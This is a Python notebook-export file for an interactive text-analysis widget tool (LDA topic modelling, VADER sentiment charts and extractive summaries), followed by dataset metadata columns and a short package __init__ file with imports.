vectorizer = CountVectorizer(min_df=5, max_df=0.9,
stop_words='english', lowercase=True,
token_pattern='[a-zA-Z\-][a-zA-Z\-]{2,}')
data_vectorized = vectorizer.fit_transform(data)
# Build a Latent Dirichlet Allocation Model
lda_model = LatentDirichletAllocation(n_components=10, max_iter=10, learning_method='online')
lda_Z = lda_model.fit_transform(data_vectorized)
#clear_output()
#display(HBox([item for item in items]))
# Visualize the topics
pyLDAvis.enable_notebook()
panel = pyLDAvis.sklearn.prepare(lda_model, data_vectorized, vectorizer, mds='tsne')
display(panel)
def tm_change(change):
clear_output()
display(HBox([item for item in self.items]))
display(self.import_data)
display(widgets.Label(value="Explore topics through topic modelling. Select a feature with text values only.",layout=Layout(width='50%')))
display(widgets.Label(value="Please be patient while the output is generated. This may take a few moments.",layout=Layout(width='50%')))
#self.tm_drop=widgets.Dropdown(options=self.cols,value=self.cols[4],layout=Layout(width='50%'),description='Feature:',tooltip='Select a feature to generate wordcloud',disabled=False,)
display(self.tm_drop)
#print(self.org_df[self.wc_drop.value].dtype)
#if is_string_dtype(self.org_df[self.wc_drop.value])==False:
#raise ValueError("That is not a suitable feature to generate WordCloud. Select a feature with text values only.")
data=self.org_df[self.tm_drop.value]
vectorizer = CountVectorizer(min_df=5, max_df=0.9,
stop_words='english', lowercase=True,
token_pattern='[a-zA-Z\-][a-zA-Z\-]{2,}')
data_vectorized = vectorizer.fit_transform(data)
# Build a Latent Dirichlet Allocation Model
lda_model = LatentDirichletAllocation(n_components=10, max_iter=10, learning_method='online')
lda_Z = lda_model.fit_transform(data_vectorized)
#clear_output()
#display(HBox([item for item in items]))
# Visualize the topics
pyLDAvis.enable_notebook()
panel = pyLDAvis.sklearn.prepare(lda_model, data_vectorized, vectorizer, mds='tsne')
display(panel)
self.tm_drop.observe(tm_change,'value')
except Exception as ve:
print(ve)
print("That is not a suitable feature for Topic Modelling. Select a feature with text values only.")
def tm_change(change):
clear_output()
display(HBox([item for item in self.items]))
display(self.import_data)
display(widgets.Label(value="Explore topics through topic modelling. Select a feature with text values only.",layout=Layout(width='50%')))
display(widgets.Label(value="Please be patient while the output is generated. This may take a few moments.",layout=Layout(width='50%')))
#self.tm_drop=widgets.Dropdown(options=self.cols,value=self.cols[4],layout=Layout(width='50%'),description='Feature:',tooltip='Select a feature to generate wordcloud',disabled=False,)
display(self.tm_drop)
#print(self.org_df[self.wc_drop.value].dtype)
#if is_string_dtype(self.org_df[self.wc_drop.value])==False:
#raise ValueError("That is not a suitable feature to generate WordCloud. Select a feature with text values only.")
data=self.org_df[self.tm_drop.value]
vectorizer = CountVectorizer(min_df=5, max_df=0.9,
stop_words='english', lowercase=True,
token_pattern='[a-zA-Z\-][a-zA-Z\-]{2,}')
data_vectorized = vectorizer.fit_transform(data)
# Build a Latent Dirichlet Allocation Model
lda_model = LatentDirichletAllocation(n_components=10, max_iter=10, learning_method='online')
lda_Z = lda_model.fit_transform(data_vectorized)
#clear_output()
#display(HBox([item for item in items]))
# Visualize the topics
pyLDAvis.enable_notebook()
panel = pyLDAvis.sklearn.prepare(lda_model, data_vectorized, vectorizer, mds='tsne')
display(panel)
finally:
self.tm_drop.observe(tm_change,'value')
def sa_data(self,b):
try:
if self.sheet==None or self.sheet=="":
clear_output()
display(HBox([item for item in self.items]))
display(self.import_data)
display("Please change data settings before use")
else:
clear_output()
display(HBox([item for item in self.items]))
display(self.import_data)
display(widgets.Label(value="Opinion mining. Select a feature with text values only.",layout=Layout(width='50%')))
display(widgets.Label(value="Please be patient while the output is generated. This may take a few moments.",layout=Layout(width='50%')))
self.sa_drop=widgets.Dropdown(options=self.cols,value=self.cols[0],layout=Layout(width='50%'),description='Feature:',tooltip='Select a feature to generate wordcloud',disabled=False,)
display(self.sa_drop)
all_reviews=self.org_df[self.sa_drop.value]
#sentiment analysis
analyser = SentimentIntensityAnalyzer()
pos_entire=[]
neg_entire=[]
neutral_entire=[]
for review in all_reviews:
scores = analyser.polarity_scores(review)
if scores['compound']<=-0.5:
neg_entire.append(review)
if scores['compound']>=0.5:
pos_entire.append(review)
if scores['compound']>-0.5 and scores['compound']<0.5:
neutral_entire.append(review)
#clear_output()
#display(HBox([item for item in items]))
type_length=[len(pos_entire),len(neutral_entire),len(neg_entire)]
sent_type=['positive','neutral','negative']
plt.pie(type_length, labels=sent_type, startangle=90, autopct='%.1f%%')
plt.title('Sentiment distribution')
plt.show()
bars1 = [len(pos_entire)]
bars2 = [len(neutral_entire)]
bars3 = [len(neg_entire)]
sent_type=['positive','neutral','negative']
# set width of bar
barWidth = 0.25
# Set position of bar on X axis
r1 = np.arange(len(bars1))
r2 = [x + barWidth for x in r1]
r3 = [x + barWidth for x in r2]
# Make the plot
plt.figure(figsize=(15,10))
plt.bar(r1, bars1, width=barWidth, edgecolor='white', label='Positive')
plt.bar(r2, bars2, width=barWidth, edgecolor='white', label='Neutral')
plt.bar(r3, bars3, width=barWidth, edgecolor='white', label='Negative')
# Add xticks on the middle of the group bars
plt.xlabel('Group', fontweight='bold')
plt.xticks([r + barWidth for r in range(len(bars1))], ['Entire Cohort'])
# Create legend & Show graphic
plt.legend()
plt.title('Sentiment Distributions')
plt.show()
def sa_change(change):
clear_output()
display(HBox([item for item in self.items]))
display(self.import_data)
display(widgets.Label(value="Opinion mining. Select a feature with text values only.",layout=Layout(width='50%')))
display(widgets.Label(value="Please be patient while the output is generated. This may take a few moments.",layout=Layout(width='50%')))
#self.sa_drop=widgets.Dropdown(options=self.cols,value=self.cols[0],layout=Layout(width='50%'),description='Feature:',tooltip='Select a feature to generate wordcloud',disabled=False,)
display(self.sa_drop)
all_reviews=self.org_df[self.sa_drop.value]
#sentiment analysis
analyser = SentimentIntensityAnalyzer()
pos_entire=[]
neg_entire=[]
neutral_entire=[]
for review in all_reviews:
scores = analyser.polarity_scores(review)
if scores['compound']<=-0.5:
neg_entire.append(review)
if scores['compound']>=0.5:
pos_entire.append(review)
if scores['compound']>-0.5 and scores['compound']<0.5:
neutral_entire.append(review)
#clear_output()
#display(HBox([item for item in items]))
type_length=[len(pos_entire),len(neutral_entire),len(neg_entire)]
sent_type=['positive','neutral','negative']
plt.pie(type_length, labels=sent_type, startangle=90, autopct='%.1f%%')
plt.title('Sentiment distribution')
plt.show()
bars1 = [len(pos_entire)]
bars2 = [len(neutral_entire)]
bars3 = [len(neg_entire)]
sent_type=['positive','neutral','negative']
# set width of bar
barWidth = 0.25
# Set position of bar on X axis
r1 = np.arange(len(bars1))
r2 = [x + barWidth for x in r1]
r3 = [x + barWidth for x in r2]
# Make the plot
plt.figure(figsize=(15,10))
plt.bar(r1, bars1, width=barWidth, edgecolor='white', label='Positive')
plt.bar(r2, bars2, width=barWidth, edgecolor='white', label='Neutral')
plt.bar(r3, bars3, width=barWidth, edgecolor='white', label='Negative')
# Add xticks on the middle of the group bars
plt.xlabel('Group', fontweight='bold')
plt.xticks([r + barWidth for r in range(len(bars1))], ['Entire Cohort'])
# Create legend & Show graphic
plt.legend()
plt.title('Sentiment Distributions')
plt.show()
self.sa_drop.observe(sa_change,'value')
except Exception as ve:
print(ve)
print("That is not a suitable feature for Sentiment Analysis. Select a feature with text values only.")
def sa_change(change):
clear_output()
display(HBox([item for item in self.items]))
display(self.import_data)
display(widgets.Label(value="Opinion mining. Select a feature with text values only.",layout=Layout(width='50%')))
display(widgets.Label(value="Please be patient while the output is generated. This may take a few moments.",layout=Layout(width='50%')))
#self.sa_drop=widgets.Dropdown(options=self.cols,value=self.cols[0],layout=Layout(width='50%'),description='Feature:',tooltip='Select a feature to generate wordcloud',disabled=False,)
display(self.sa_drop)
all_reviews=self.org_df[self.sa_drop.value]
#sentiment analysis
analyser = SentimentIntensityAnalyzer()
pos_entire=[]
neg_entire=[]
neutral_entire=[]
for review in all_reviews:
scores = analyser.polarity_scores(review)
if scores['compound']<=-0.5:
neg_entire.append(review)
if scores['compound']>=0.5:
pos_entire.append(review)
if scores['compound']>-0.5 and scores['compound']<0.5:
neutral_entire.append(review)
#clear_output()
#display(HBox([item for item in items]))
type_length=[len(pos_entire),len(neutral_entire),len(neg_entire)]
sent_type=['positive','neutral','negative']
plt.pie(type_length, labels=sent_type, startangle=90, autopct='%.1f%%')
plt.title('Sentiment distribution')
plt.show()
bars1 = [len(pos_entire)]
bars2 = [len(neutral_entire)]
bars3 = [len(neg_entire)]
sent_type=['positive','neutral','negative']
# set width of bar
barWidth = 0.25
# Set position of bar on X axis
r1 = np.arange(len(bars1))
r2 = [x + barWidth for x in r1]
r3 = [x + barWidth for x in r2]
# Make the plot
plt.figure(figsize=(15,10))
plt.bar(r1, bars1, width=barWidth, edgecolor='white', label='Positive')
plt.bar(r2, bars2, width=barWidth, edgecolor='white', label='Neutral')
plt.bar(r3, bars3, width=barWidth, edgecolor='white', label='Negative')
# Add xticks on the middle of the group bars
plt.xlabel('Group', fontweight='bold')
plt.xticks([r + barWidth for r in range(len(bars1))], ['Entire Cohort'])
# Create legend & Show graphic
plt.legend()
plt.title('Sentiment Distributions')
plt.show()
finally:
self.sa_drop.observe(sa_change,'value')
def ts_data(self,b):
try:
if self.sheet==None or self.sheet=="":
clear_output()
display(HBox([item for item in self.items]))
display(self.import_data)
display("Please change data settings before use")
else:
clear_output()
display(HBox([item for item in self.items]))
display(self.import_data)
display(widgets.Label(value="Select a feature with text values only.",layout=Layout(width='50%')))
display(widgets.Label(value="Please be patient while the output is generated. This may take a few moments.",layout=Layout(width='50%')))
self.ts_drop=widgets.Dropdown(options=self.cols,value=self.cols[0],layout=Layout(width='50%'),description='Feature:',tooltip='Select a feature to generate wordcloud',disabled=False,)
display(self.ts_drop)
all_reviews=self.org_df[self.ts_drop.value]
pos_entire=[]
neg_entire=[]
neutral_entire=[]
analyser = SentimentIntensityAnalyzer()
for review in all_reviews:
scores = analyser.polarity_scores(review)
if scores['compound']<=-0.5:
neg_entire.append(review)
if scores['compound']>=0.5:
pos_entire.append(review)
if scores['compound']>-0.5 and scores['compound']<0.5:
neutral_entire.append(review)
#sentiment analysis
#clear_output()
#display(HBox([item for item in items]))
self.bpos = widgets.Button(description="Next positive text",button_style='success',layout=Layout(width='175px'))
self.bneg = widgets.Button(description="Next negative text",button_style='danger',layout=Layout(width='175px'))
self.bneu = widgets.Button(description="Next neutral text",button_style='info',layout=Layout(width='175px'))
display(HBox([self.bpos,self.bneu,self.bneg]))
########################################################################
def posref(b):
#clear_output()
#display(HBox([item for item in items]))
#display(HBox([bpos,bneu,bneg]))
clear_output()
display(HBox([item for item in self.items]))
display(self.import_data)
display(self.ts_drop)
display(HBox([self.bpos,self.bneu,self.bneg]))
print("\nPositive Text\n")
display(pos_entire[0])
text_for_summ=pos_entire[0]
article_text = re.sub(r'\[[0-9]*\]', ' ', text_for_summ)
article_text = re.sub(r'\s+', ' ', article_text)
formatted_article_text = re.sub('[^a-zA-Z]', ' ', article_text )
formatted_article_text = re.sub(r'\s+', ' ', formatted_article_text)
sentence_list = nl.sent_tokenize(article_text)
stopwords = nl.corpus.stopwords.words('english')
word_frequencies = {}
for word in nl.word_tokenize(formatted_article_text):
if word not in stopwords:
if word not in word_frequencies.keys():
word_frequencies[word] = 1
else:
word_frequencies[word] += 1
maximum_frequncy = max(word_frequencies.values())
for word in word_frequencies.keys():
word_frequencies[word] = (word_frequencies[word]/maximum_frequncy)
sentence_scores = {}
for sent in sentence_list:
for word in nl.word_tokenize(sent.lower()):
if word in word_frequencies.keys():
if len(sent.split(' ')) < 30:
if sent not in sentence_scores.keys():
sentence_scores[sent] = word_frequencies[word]
else:
sentence_scores[sent] += word_frequencies[word]
import heapq
summary_sentences = heapq.nlargest(7, sentence_scores, key=sentence_scores.get)
summary = ' '.join(summary_sentences)
tokens = word_tokenize(summary)
tagged = pos_tag(tokens)
visualizer = PosTagVisualizer()
visualizer.transform(tagged)
#print(' '.join((visualizer.colorize(token, color) for color, token in visualizer.tagged)))
display('===================================SUMMARY=========================================================')
#display(' '.join((visualizer.colorize(token, color) for color, token in visualizer.tagged)))
print(' '.join((visualizer.colorize(token, color) for color, token in visualizer.tagged)))
print('\n')
item_rem=pos_entire.pop(0)
pos_entire.append(item_rem)
self.bpos.on_click(posref)
def neuref(b):
clear_output()
display(HBox([item for item in self.items]))
display(self.import_data)
display(self.ts_drop)
display(HBox([self.bpos,self.bneu,self.bneg]))
print("\nNeutral Text\n")
display(neutral_entire[0])
text_for_summ=neutral_entire[0]
article_text = re.sub(r'\[[0-9]*\]', ' ', text_for_summ)
article_text = re.sub(r'\s+', ' ', article_text)
formatted_article_text = re.sub('[^a-zA-Z]', ' ', article_text )
formatted_article_text = re.sub(r'\s+', ' ', formatted_article_text)
sentence_list = nl.sent_tokenize(article_text)
stopwords = nl.corpus.stopwords.words('english')
word_frequencies = {}
for word in nl.word_tokenize(formatted_article_text):
if word not in stopwords:
if word not in word_frequencies.keys():
word_frequencies[word] = 1
else:
word_frequencies[word] += 1
maximum_frequncy = max(word_frequencies.values())
for word in word_frequencies.keys():
word_frequencies[word] = (word_frequencies[word]/maximum_frequncy)
sentence_scores = {}
for sent in sentence_list:
for word in nl.word_tokenize(sent.lower()):
if word in word_frequencies.keys():
if len(sent.split(' ')) < 30:
if sent not in sentence_scores.keys():
sentence_scores[sent] = word_frequencies[word]
else:
sentence_scores[sent] += word_frequencies[word]
import heapq
summary_sentences = heapq.nlargest(7, sentence_scores, key=sentence_scores.get)
summary = ' '.join(summary_sentences)
tokens = word_tokenize(summary)
tagged = pos_tag(tokens)
visualizer = PosTagVisualizer()
visualizer.transform(tagged)
display('===================================SUMMARY=========================================================')
#display(summary)
print(' '.join((visualizer.colorize(token, color) for color, token in visualizer.tagged)))
print('\n')
item_rem=neutral_entire.pop(0)
neutral_entire.append(item_rem)
self.bneu.on_click(neuref)
def negref(b):
clear_output()
display(HBox([item for item in self.items]))
display(self.import_data)
display(self.ts_drop)
display(HBox([self.bpos,self.bneu,self.bneg]))
print("\nNegative Text\n")
display(neg_entire[0])
text_for_summ=neg_entire[0]
article_text = re.sub(r'\[[0-9]*\]', ' ', text_for_summ)
article_text = re.sub(r'\s+', ' ', article_text)
formatted_article_text = re.sub('[^a-zA-Z]', ' ', article_text )
formatted_article_text = re.sub(r'\s+', ' ', formatted_article_text)
sentence_list = nl.sent_tokenize(article_text)
stopwords = nl.corpus.stopwords.words('english')
word_frequencies = {}
for word in nl.word_tokenize(formatted_article_text):
if word not in stopwords:
if word not in word_frequencies.keys():
word_frequencies[word] = 1
else:
word_frequencies[word] += 1
maximum_frequncy = max(word_frequencies.values())
for word in word_frequencies.keys():
word_frequencies[word] = (word_frequencies[word]/maximum_frequncy)
sentence_scores = {}
for sent in sentence_list:
for word in nl.word_tokenize(sent.lower()):
if word in word_frequencies.keys():
if len(sent.split(' ')) < 30:
if sent not in sentence_scores.keys():
sentence_scores[sent] = word_frequencies[word]
else:
sentence_scores[sent] += word_frequencies[word]
import heapq
summary_sentences = heapq.nlargest(7, sentence_scores, key=sentence_scores.get)
summary = ' '.join(summary_sentences)
tokens = word_tokenize(summary)
tagged = pos_tag(tokens)
visualizer = PosTagVisualizer()
visualizer.transform(tagged)
display('===================================SUMMARY=========================================================')
#display(summary)
print(' '.join((visualizer.colorize(token, color) for color, token in visualizer.tagged)))
print('\n')
item_rem=neg_entire.pop(0)
neg_entire.append(item_rem)
self.bneg.on_click(negref)
def ts_change(change):
clear_output()
display(HBox([item for item in self.items]))
display(self.import_data)
display(widgets.Label(value="Select a feature with text values only.",layout=Layout(width='50%')))
display(widgets.Label(value="Please be patient while the output is generated. This may take a few moments.",layout=Layout(width='50%')))
#self.ts_drop=widgets.Dropdown(options=self.cols,value=self.cols[4],layout=Layout(width='50%'),description='Feature:',tooltip='Select a feature to generate wordcloud',disabled=False,)
display(self.ts_drop)
all_reviews=self.org_df[self.ts_drop.value]
pos_entire=[]
neg_entire=[]
neutral_entire=[]
analyser = SentimentIntensityAnalyzer()
for review in all_reviews:
scores = analyser.polarity_scores(review)
if scores['compound']<=-0.5:
neg_entire.append(review)
if scores['compound']>=0.5:
pos_entire.append(review)
if scores['compound']>-0.5 and scores['compound']<0.5:
neutral_entire.append(review)
#sentiment analysis
#clear_output()
#display(HBox([item for item in items]))
self.bpos = widgets.Button(description="Next positive text",button_style='success',layout=Layout(width='175px'))
self.bneg = widgets.Button(description="Next negative text",button_style='danger',layout=Layout(width='175px'))
self.bneu = widgets.Button(description="Next neutral text",button_style='info',layout=Layout(width='175px'))
display(HBox([self.bpos,self.bneu,self.bneg]))
########################################################################
def posref(b):
#clear_output()
#display(HBox([item for item in items]))
#display(HBox([bpos,bneu,bneg]))
clear_output()
display(HBox([item for item in self.items]))
display(self.import_data)
display(self.ts_drop)
display(HBox([self.bpos,self.bneu,self.bneg]))
print("\nPositive Text\n")
display(pos_entire[0])
text_for_summ=pos_entire[0]
article_text = re.sub(r'\[[0-9]*\]', ' ', text_for_summ)
article_text = re.sub(r'\s+', ' ', article_text)
formatted_article_text = re.sub('[^a-zA-Z]', ' ', article_text )
formatted_article_text = re.sub(r'\s+', ' ', formatted_article_text)
sentence_list = nl.sent_tokenize(article_text)
stopwords = nl.corpus.stopwords.words('english')
word_frequencies = {}
for word in nl.word_tokenize(formatted_article_text):
if word not in stopwords:
if word not in word_frequencies.keys():
word_frequencies[word] = 1
else:
word_frequencies[word] += 1
maximum_frequncy = max(word_frequencies.values())
for word in word_frequencies.keys():
word_frequencies[word] = (word_frequencies[word]/maximum_frequncy)
sentence_scores = {}
for sent in sentence_list:
for word in nl.word_tokenize(sent.lower()):
if word in word_frequencies.keys():
if len(sent.split(' ')) < 30:
if sent not in sentence_scores.keys():
sentence_scores[sent] = word_frequencies[word]
else:
sentence_scores[sent] += word_frequencies[word]
import heapq
summary_sentences = heapq.nlargest(7, sentence_scores, key=sentence_scores.get)
summary = ' '.join(summary_sentences)
tokens = word_tokenize(summary)
tagged = pos_tag(tokens)
visualizer = PosTagVisualizer()
visualizer.transform(tagged)
#print(' '.join((visualizer.colorize(token, color) for color, token in visualizer.tagged)))
display('===================================SUMMARY=========================================================')
#display(' '.join((visualizer.colorize(token, color) for color, token in visualizer.tagged)))
print(' '.join((visualizer.colorize(token, color) for color, token in visualizer.tagged)))
print('\n')
item_rem=pos_entire.pop(0)
pos_entire.append(item_rem)
self.bpos.on_click(posref)
def neuref(b):
clear_output()
display(HBox([item for item in self.items]))
display(self.import_data)
display(self.ts_drop)
display(HBox([self.bpos,self.bneu,self.bneg]))
print("\nNeutral Text\n")
display(neutral_entire[0])
text_for_summ=neutral_entire[0]
article_text = re.sub(r'\[[0-9]*\]', ' ', text_for_summ)
article_text = re.sub(r'\s+', ' ', article_text)
formatted_article_text = re.sub('[^a-zA-Z]', ' ', article_text )
formatted_article_text = re.sub(r'\s+', ' ', formatted_article_text)
sentence_list = nl.sent_tokenize(article_text)
stopwords = nl.corpus.stopwords.words('english')
word_frequencies = {}
for word in nl.word_tokenize(formatted_article_text):
if word not in stopwords:
if word not in word_frequencies.keys():
word_frequencies[word] = 1
else:
word_frequencies[word] += 1
maximum_frequncy = max(word_frequencies.values())
for word in word_frequencies.keys():
word_frequencies[word] = (word_frequencies[word]/maximum_frequncy)
sentence_scores = {}
for sent in sentence_list:
for word in nl.word_tokenize(sent.lower()):
if word in word_frequencies.keys():
if len(sent.split(' ')) < 30:
if sent not in sentence_scores.keys():
sentence_scores[sent] = word_frequencies[word]
else:
sentence_scores[sent] += word_frequencies[word]
import heapq
summary_sentences = heapq.nlargest(7, sentence_scores, key=sentence_scores.get)
summary = ' '.join(summary_sentences)
tokens = word_tokenize(summary)
tagged = pos_tag(tokens)
visualizer = PosTagVisualizer()
visualizer.transform(tagged)
display('===================================SUMMARY=========================================================')
#display(summary)
print(' '.join((visualizer.colorize(token, color) for color, token in visualizer.tagged)))
print('\n')
item_rem=neutral_entire.pop(0)
neutral_entire.append(item_rem)
self.bneu.on_click(neuref)
def negref(b):
clear_output()
display(HBox([item for item in self.items]))
display(self.import_data)
display(self.ts_drop)
display(HBox([self.bpos,self.bneu,self.bneg]))
print("\nNegative Text\n")
display(neg_entire[0])
text_for_summ=neg_entire[0]
article_text = re.sub(r'\[[0-9]*\]', ' ', text_for_summ)
article_text = re.sub(r'\s+', ' ', article_text)
formatted_article_text = re.sub('[^a-zA-Z]', ' ', article_text )
formatted_article_text = re.sub(r'\s+', ' ', formatted_article_text)
sentence_list = nl.sent_tokenize(article_text)
stopwords = nl.corpus.stopwords.words('english')
word_frequencies = {}
for word in nl.word_tokenize(formatted_article_text):
if word not in stopwords:
if word not in word_frequencies.keys():
word_frequencies[word] = 1
else:
word_frequencies[word] += 1
maximum_frequncy = max(word_frequencies.values())
for word in word_frequencies.keys():
word_frequencies[word] = (word_frequencies[word]/maximum_frequncy)
sentence_scores = {}
for sent in sentence_list:
for word in nl.word_tokenize(sent.lower()):
if word in word_frequencies.keys():
if len(sent.split(' ')) < 30:
if sent not in sentence_scores.keys():
sentence_scores[sent] = word_frequencies[word]
else:
sentence_scores[sent] += word_frequencies[word]
import heapq
summary_sentences = heapq.nlargest(7, sentence_scores, key=sentence_scores.get)
summary = ' '.join(summary_sentences)
tokens = word_tokenize(summary)
tagged = pos_tag(tokens)
visualizer = PosTagVisualizer()
visualizer.transform(tagged)
display('===================================SUMMARY=========================================================')
#display(summary)
print(' '.join((visualizer.colorize(token, color) for color, token in visualizer.tagged)))
print('\n')
item_rem=neg_entire.pop(0)
neg_entire.append(item_rem)
self.bneg.on_click(negref)
self.ts_drop.observe(ts_change,'value')
except Exception as ve:
print(ve)
print("That is not a suitable feature for Sentiment Analysis. Select a feature with text values only.")
def ts_change(change):
clear_output()
display(HBox([item for item in self.items]))
display(self.import_data)
display(widgets.Label(value="Select a feature with text values only.",layout=Layout(width='50%')))
display(widgets.Label(value="Please be patient while the output is generated. This may take a few moments.",layout=Layout(width='50%')))
#self.ts_drop=widgets.Dropdown(options=self.cols,value=self.cols[4],layout=Layout(width='50%'),description='Feature:',tooltip='Select a feature to generate wordcloud',disabled=False,)
display(self.ts_drop)
all_reviews=self.org_df[self.ts_drop.value]
pos_entire=[]
neg_entire=[]
neutral_entire=[]
analyser = SentimentIntensityAnalyzer()
for review in all_reviews:
scores = analyser.polarity_scores(review)
if scores['compound']<=-0.5:
neg_entire.append(review)
if scores['compound']>=0.5:
pos_entire.append(review)
if scores['compound']>-0.5 and scores['compound']<0.5:
neutral_entire.append(review)
#sentiment analysis
#clear_output()
#display(HBox([item for item in items]))
self.bpos = widgets.Button(description="Next positive text",button_style='success',layout=Layout(width='175px'))
self.bneg = widgets.Button(description="Next negative text",button_style='danger',layout=Layout(width='175px'))
self.bneu = widgets.Button(description="Next neutral text",button_style='info',layout=Layout(width='175px'))
display(HBox([self.bpos,self.bneu,self.bneg]))
########################################################################
def posref(b):
#clear_output()
#display(HBox([item for item in items]))
#display(HBox([bpos,bneu,bneg]))
clear_output()
display(HBox([item for item in self.items]))
display(self.import_data)
display(self.ts_drop)
display(HBox([self.bpos,self.bneu,self.bneg]))
print("\nPositive Text\n")
display(pos_entire[0])
text_for_summ=pos_entire[0]
article_text = re.sub(r'\[[0-9]*\]', ' ', text_for_summ)
article_text = re.sub(r'\s+', ' ', article_text)
formatted_article_text = re.sub('[^a-zA-Z]', ' ', article_text )
formatted_article_text = re.sub(r'\s+', ' ', formatted_article_text)
sentence_list = nl.sent_tokenize(article_text)
stopwords = nl.corpus.stopwords.words('english')
word_frequencies = {}
for word in nl.word_tokenize(formatted_article_text):
if word not in stopwords:
if word not in word_frequencies.keys():
word_frequencies[word] = 1
else:
word_frequencies[word] += 1
maximum_frequncy = max(word_frequencies.values())
for word in word_frequencies.keys():
word_frequencies[word] = (word_frequencies[word]/maximum_frequncy)
sentence_scores = {}
for sent in sentence_list:
for word in nl.word_tokenize(sent.lower()):
if word in word_frequencies.keys():
if len(sent.split(' ')) < 30:
if sent not in sentence_scores.keys():
sentence_scores[sent] = word_frequencies[word]
else:
sentence_scores[sent] += word_frequencies[word]
import heapq
summary_sentences = heapq.nlargest(7, sentence_scores, key=sentence_scores.get)
summary = ' '.join(summary_sentences)
tokens = word_tokenize(summary)
tagged = pos_tag(tokens)
visualizer = PosTagVisualizer()
visualizer.transform(tagged)
#print(' '.join((visualizer.colorize(token, color) for color, token in visualizer.tagged)))
display('===================================SUMMARY=========================================================')
#display(' '.join((visualizer.colorize(token, color) for color, token in visualizer.tagged)))
print(' '.join((visualizer.colorize(token, color) for color, token in visualizer.tagged)))
print('\n')
item_rem=pos_entire.pop(0)
pos_entire.append(item_rem)
self.bpos.on_click(posref)
def neuref(b):
clear_output()
display(HBox([item for item in self.items]))
display(self.import_data)
display(self.ts_drop)
display(HBox([self.bpos,self.bneu,self.bneg]))
print("\nNeutral Text\n")
display(neutral_entire[0])
text_for_summ=neutral_entire[0]
article_text = re.sub(r'\[[0-9]*\]', ' ', text_for_summ)
article_text = re.sub(r'\s+', ' ', article_text)
formatted_article_text = re.sub('[^a-zA-Z]', ' ', article_text )
formatted_article_text = re.sub(r'\s+', ' ', formatted_article_text)
sentence_list = nl.sent_tokenize(article_text)
stopwords = nl.corpus.stopwords.words('english')
word_frequencies = {}
for word in nl.word_tokenize(formatted_article_text):
if word not in stopwords:
if word not in word_frequencies.keys():
word_frequencies[word] = 1
else:
word_frequencies[word] += 1
maximum_frequncy = max(word_frequencies.values())
for word in word_frequencies.keys():
word_frequencies[word] = (word_frequencies[word]/maximum_frequncy)
sentence_scores = {}
for sent in sentence_list:
for word in nl.word_tokenize(sent.lower()):
if word in word_frequencies.keys():
if len(sent.split(' ')) < 30:
if sent not in sentence_scores.keys():
sentence_scores[sent] = word_frequencies[word]
else:
sentence_scores[sent] += word_frequencies[word]
import heapq
summary_sentences = heapq.nlargest(7, sentence_scores, key=sentence_scores.get)
summary = ' '.join(summary_sentences)
tokens = word_tokenize(summary)
tagged = pos_tag(tokens)
visualizer = PosTagVisualizer()
visualizer.transform(tagged)
display('===================================SUMMARY=========================================================')
#display(summary)
print(' '.join((visualizer.colorize(token, color) for color, token in visualizer.tagged)))
print('\n')
item_rem=neutral_entire.pop(0)
neutral_entire.append(item_rem)
self.bneu.on_click(neuref)
def negref(b):
clear_output()
display(HBox([item for item in self.items]))
display(self.import_data)
display(self.ts_drop)
display(HBox([self.bpos,self.bneu,self.bneg]))
print("\nNegative Text\n")
display(neg_entire[0])
text_for_summ=neg_entire[0]
article_text = re.sub(r'\[[0-9]*\]', ' ', text_for_summ)
article_text = re.sub(r'\s+', ' ', article_text)
formatted_article_text = re.sub('[^a-zA-Z]', ' ', article_text )
formatted_article_text = re.sub(r'\s+', ' ', formatted_article_text)
sentence_list = nl.sent_tokenize(article_text)
stopwords = nl.corpus.stopwords.words('english')
word_frequencies = {}
for word in nl.word_tokenize(formatted_article_text):
if word not in stopwords:
if word not in word_frequencies.keys():
word_frequencies[word] = 1
else:
word_frequencies[word] += 1
maximum_frequncy = max(word_frequencies.values())
for word in word_frequencies.keys():
word_frequencies[word] = (word_frequencies[word]/maximum_frequncy)
sentence_scores = {}
for sent in sentence_list:
for word in nl.word_tokenize(sent.lower()):
if word in word_frequencies.keys():
if len(sent.split(' ')) < 30:
if sent not in sentence_scores.keys():
sentence_scores[sent] = word_frequencies[word]
else:
sentence_scores[sent] += word_frequencies[word]
import heapq
summary_sentences = heapq.nlargest(7, sentence_scores, key=sentence_scores.get)
summary = ' '.join(summary_sentences)
tokens = word_tokenize(summary)
tagged = pos_tag(tokens)
visualizer = PosTagVisualizer()
visualizer.transform(tagged)
display('===================================SUMMARY=========================================================')
#display(summary)
print(' '.join((visualizer.colorize(token, color) for color, token in visualizer.tagged)))
print('\n')
item_rem=neg_entire.pop(0)
neg_entire.append(item_rem)
self.bneg.on_click(negref)
finally:
self.ts_drop.observe(ts_change,'value')
# In[117]:
def main():
obj=SSP()
# In[118]:
if __name__=='__main__':
np.warnings.filterwarnings('ignore')
main()
| 43.022972
| 225
| 0.499858
| 8,768
| 88,025
| 4.87979
| 0.070027
| 0.034708
| 0.022648
| 0.02398
| 0.890969
| 0.880335
| 0.877109
| 0.871944
| 0.870098
| 0.864722
| 0
| 0.014209
| 0.385175
| 88,025
| 2,045
| 226
| 43.04401
| 0.776367
| 0.085964
| 0
| 0.849693
| 0
| 0
| 0.100139
| 0.012405
| 0
| 0
| 0
| 0.000489
| 0
| 1
| 0.02684
| false
| 0
| 0.075153
| 0.000767
| 0.104294
| 0.035276
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9649ec5f99e1946cbd7869af31d388b45ab5c531
| 154
|
py
|
Python
|
src/ctc/db/schemas/contract_abis/__init__.py
|
fei-protocol/checkthechain
|
ec838f3d0d44af228f45394d9ba8d8eb7f677520
|
[
"MIT"
] | 94
|
2022-02-15T19:34:49.000Z
|
2022-03-26T19:26:22.000Z
|
src/ctc/db/schemas/contract_abis/__init__.py
|
fei-protocol/checkthechain
|
ec838f3d0d44af228f45394d9ba8d8eb7f677520
|
[
"MIT"
] | 7
|
2022-03-03T02:58:47.000Z
|
2022-03-11T18:41:05.000Z
|
src/ctc/db/schemas/contract_abis/__init__.py
|
fei-protocol/checkthechain
|
ec838f3d0d44af228f45394d9ba8d8eb7f677520
|
[
"MIT"
] | 7
|
2022-02-15T17:53:07.000Z
|
2022-03-17T19:14:17.000Z
|
from .contract_abis_intake import *
from .contract_abis_queries import *
from .contract_abis_schema_defs import *
